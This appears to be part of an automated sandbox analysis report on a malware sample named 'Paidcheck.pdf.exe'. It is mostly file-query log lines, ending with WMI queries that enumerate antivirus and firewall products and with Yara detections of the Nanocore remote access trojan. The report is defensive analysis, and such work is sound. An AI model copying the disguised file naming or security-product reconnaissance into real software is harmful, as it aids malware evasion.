      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC02F0 GetSystemTimes,
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

      Stealing of Sensitive Information:

      Yara detected Nanocore RAT
      Source: Yara match | File source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
